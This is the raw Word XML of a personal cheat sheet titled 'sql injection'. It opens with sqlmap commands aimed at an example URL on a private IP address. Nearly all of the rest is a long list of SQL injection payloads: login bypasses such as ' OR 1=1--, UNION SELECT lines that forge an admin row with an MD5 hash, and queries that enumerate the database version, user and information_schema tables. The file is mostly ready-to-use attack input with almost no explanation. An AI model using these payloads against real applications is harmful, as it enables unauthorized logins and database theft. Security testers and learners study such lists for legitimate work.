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12735" w14:textId="0D8436D8" w:rsidR="008643B3" w:rsidRPr="008643B3" w:rsidRDefault="008643B3" w:rsidP="008643B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sql injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210A5A71" w14:textId="056BA421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1. sqlmap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BC8B9A" w14:textId="7C17213B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>sqlmap --wizard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6437446E" w14:textId="1E62C1C2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>sqlmap-u "http://the url u want to inject with the id " --batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B33C02" w14:textId="3215AA87" w:rsid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 xml:space="preserve">example: sqlmap-u "http://192.168.0.0/room.php?cod=1" </w:t>
      </w:r>
      <w:r w:rsidR="00CF6216">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D997AE" w14:textId="31B0AF78" w:rsidR="00CF6216" w:rsidRDefault="00CF6216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3110583E" w14:textId="77777777" w:rsidR="00CF6216" w:rsidRPr="00CF6216" w:rsidRDefault="00CF6216" w:rsidP="00CF6216">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF6216">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;username&gt;' OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B16117F" w14:textId="77777777" w:rsidR="00CF6216" w:rsidRPr="00CF6216" w:rsidRDefault="00CF6216" w:rsidP="00CF6216">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF6216">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>'OR '' = '</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6216">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Allows authentication without a valid username.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AA2035" w14:textId="77777777" w:rsidR="00CF6216" w:rsidRPr="00CF6216" w:rsidRDefault="00CF6216" w:rsidP="00CF6216">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF6216">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;username&gt;'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A280C0" w14:textId="77777777" w:rsidR="00CF6216" w:rsidRPr="00CF6216" w:rsidRDefault="00CF6216" w:rsidP="00CF6216">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF6216">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>' union select 1, '&lt;user-fieldname&gt;', '&lt;pass-fieldname&gt;' 1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBED450" w14:textId="42320404" w:rsidR="00CF6216" w:rsidRDefault="00CF6216" w:rsidP="00CF6216">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF6216">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>'OR 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C94C9D" w14:textId="77777777" w:rsidR="00CF6216" w:rsidRDefault="00CF6216" w:rsidP="008643B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52594F54" w14:textId="35C71656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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>'-'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474527A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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430E045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'&amp;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA121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'^'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6224DFE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'*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAFBD0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''-'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF369E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 '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183334F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''&amp;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F82A97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''^'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ACF32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''*'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF8273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"-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E04FD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"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207E5B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"&amp;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8C70F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"^"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D6AE0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"*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDE93B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""-"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD5992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 "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C61B74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""&amp;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBFE7A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""^"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2767A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""*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC07E7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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C033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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D96159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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C74F0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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462F54B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true--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D30CB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9C70F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('x')=('x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA6D0C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')) or (('x'))=(('x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A457B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"x"="x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C5866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("x")=("x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C3155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")) or (("x"))=(("x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1642E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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010AC3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1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AACC60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1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3136C06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1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C802DE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--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6D9B6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admin' #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EFD03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admin'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72142D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B168EC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'1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6FA04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'1'='1'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0464FB5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'1'='1'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310C1FE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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin'or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1=1 or ''='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3930200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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0649A13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1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BA40F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1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715B7EA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1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1794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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4999A0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('1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C0A5F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('1'='1'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAC52E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('1'='1'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF4E4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E8026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'1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB19A9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'1'='1'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8547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'1'='1'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231160F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1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2753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--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B17BEB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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD009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admin"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0CC06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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D180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admin" or "1"="1"--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD0FAF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"1"="1"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B380D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"1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30735D0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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin"or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1=1 or ""="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C5BCD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9C33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1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F309A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1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C5D1A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1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60092E9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E1E4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("1"="1"--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EECF43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("1"="1"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362D5E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("1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B5B20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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C65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"1"="1"--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293F821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"1"="1"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046F937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"1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779ED0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1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B876F2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==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C0E35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=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DD8FB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DE370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--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F26E3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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377C4B3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–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365E5F2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'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D74999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'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D35AB9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'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F05C43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--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4510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#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3387902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"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B333A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1='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD0E8E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a='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82D28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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D3A0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true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC4C4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''='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DADA8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""="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2647B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1′) and '1′='1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3999EBB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1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F449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AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B00B2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and 1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA85C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and 1=1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EE1D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'one'='one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EB02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'one'='one–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DD6B9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group by password having 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277539A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group by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>userid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having 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57308AC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group by username having 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C483A4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like '%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F15F2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0=0 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDD655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0=0 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3786922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 xml:space="preserve"> or 0=0 –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A1B5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        0=0 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B0D62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0=0 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1915006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0=0 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BCF5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0=0 –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D170BC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0=0 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082AB26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0=0 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6909B66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0=0 –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A6BF9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%' or '0'='0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1002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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2CA26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1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045EAA2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1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB33DA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1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5086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1=1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1540343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1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B20214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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA9B84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'1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C10201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'1'='1'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ABDC2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'1'='1'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6929E7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'1′='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A3658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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227ADD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1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E84388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 –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A69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1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202718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' or 1=1;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D36DF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1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482E672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1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37376B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1=1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E3A0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A512A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'1'='1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CA8BE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'1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36651B8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'1'='1'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDD7C8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'1'='1'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F00391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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569BEC1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('1'='1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BD376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('1'='1'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1403265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('1'='1'/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E37D4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('1'='1'#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D48D4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'or'1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E061FF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'or'1=1′</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C05EA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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC567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"1"="1"--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008CD51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"1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D6A08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"1"="1"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D8389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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530032A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1=1 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A502A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 –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A64429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1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535ABCD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" or 1=1/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0A9FB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1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D86F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1=1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534EC17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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F61AE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"1"="1"--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3170596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"1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2212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"1"="1"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C300CB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6484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("1"="1"--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3BE8E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("1"="1"/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63E8C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("1"="1"#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E5C67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) or '1′='1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFCFCC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) or ('1′='1–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7A6E3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 LIMIT 1;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E3A4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'or 1=1 or ''='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19333E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"or 1=1 or ""="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF1808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'a'='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DD89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a=a--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E06E4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a=a–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F455F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('a'='a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D93B8D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"a"="a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072688C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("a"="a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5982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('a'='a and hi") or ("a"="a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E969B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'one'='one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5588865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' or 'one'='one–</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719685A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or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uid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3693486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or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>uname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4B4CF89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or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>userid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62EAD2D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user like '%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A83F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username like '%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A19B7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD4DB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('x'='x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF57FB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"x"="x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5132560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'x'='x'#;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131A6BE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'=' 'or' and '=' 'or'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA93A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UNION ALL SELECT 1, @@version;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0190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UNION ALL SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>system_user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(),user();#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FC2E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UNION select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>table_schema,table_name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8643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>information_Schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008643B3">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538C121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and substring(password/text(),1,1)='7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F91F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substring(password/text(),1,1)='7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF89B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1=1 limit 1 -- -+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AC8E23" w14:textId="54443622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'="or'</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008643B3" w:rsidRPr="0086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3"/>
    <w:rsid w:val="008643B3"/>
    <w:rsid w:val="00CF6216"/>
    <w:rsid w:val="00F7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9F7"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{80EE620C-5EBA-4687-9450-69B30E1D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2024-09-26T06:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-26T07:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>